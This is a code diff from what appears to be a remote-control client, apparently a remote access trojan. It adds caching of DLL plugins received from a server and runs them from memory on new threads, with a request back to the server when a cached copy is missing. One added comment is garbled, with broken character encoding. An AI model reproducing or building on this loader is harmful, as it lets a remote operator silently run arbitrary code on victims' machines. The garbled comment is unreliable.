Improvement: Save plugin DLL in memory

client/KernelManager.cpp

@@ -198,13 +198,26 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
 	{
 	case CMD_EXECUTE_DLL: {
 #ifdef _WIN64
+		static std::map<std::string, std::vector<BYTE>> m_MemDLL;
 		const int sz = 1 + sizeof(DllExecuteInfo);
-		if (ulLength <= sz)break;
+		if (ulLength < sz)break;
 		DllExecuteInfo* info = (DllExecuteInfo*)(szBuffer + 1);
+		const char* md5 = info->Md5;
+		auto find = m_MemDLL.find(md5);
+		if (find == m_MemDLL.end() && ulLength == sz) {
+			// <20><>һ<EFBFBD><D2BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>û<EFBFBD>а<EFBFBD><D0B0><EFBFBD>DLL<4C><4C><EFBFBD>ݣ<EFBFBD><DDA3><EFBFBD><EFBFBD>ͻ<EFBFBD><CDBB>˼<EFBFBD><CBBC>Ȿ<EFBFBD><E2B1BE><EFBFBD>Ƿ<EFBFBD><C7B7>Ѿ<EFBFBD><D1BE><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>DLL<4C><4C>û<EFBFBD><C3BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ִ<EFBFBD>д<EFBFBD><D0B4><EFBFBD>
+			m_ClientObject->Send2Server((char*)szBuffer, ulLength);
+			break;
+		}
+		BYTE* data = find != m_MemDLL.end() ? find->second.data() : NULL;
 		if (info->Size == ulLength - sz && info->RunType == MEMORYDLL) {
+			if (md5[0]) m_MemDLL[md5] = std::vector<BYTE>(szBuffer + sz, szBuffer + sz + info->Size);
+			data = szBuffer + sz;
+		}
+		if (data) {
 			PluginParam param(m_conn->ServerIP(), m_conn->ServerPort(), &g_bExit, m_conn);
-			CloseHandle(CreateThread(NULL, 0, ExecuteDLLProc, new DllExecParam(*info, param, szBuffer + sz), 0, NULL));
-			Mprintf("Execute '%s'%d succeed: %d Length: %d\n", info->Name, info->CallType, szBuffer[1], info->Size);
+			CloseHandle(CreateThread(NULL, 0, ExecuteDLLProc, new DllExecParam(*info, param, data), 0, NULL));
+			Mprintf("Execute '%s'%d succeed - Length: %d\n", info->Name, info->CallType, info->Size);
 		}
 #endif
 		break;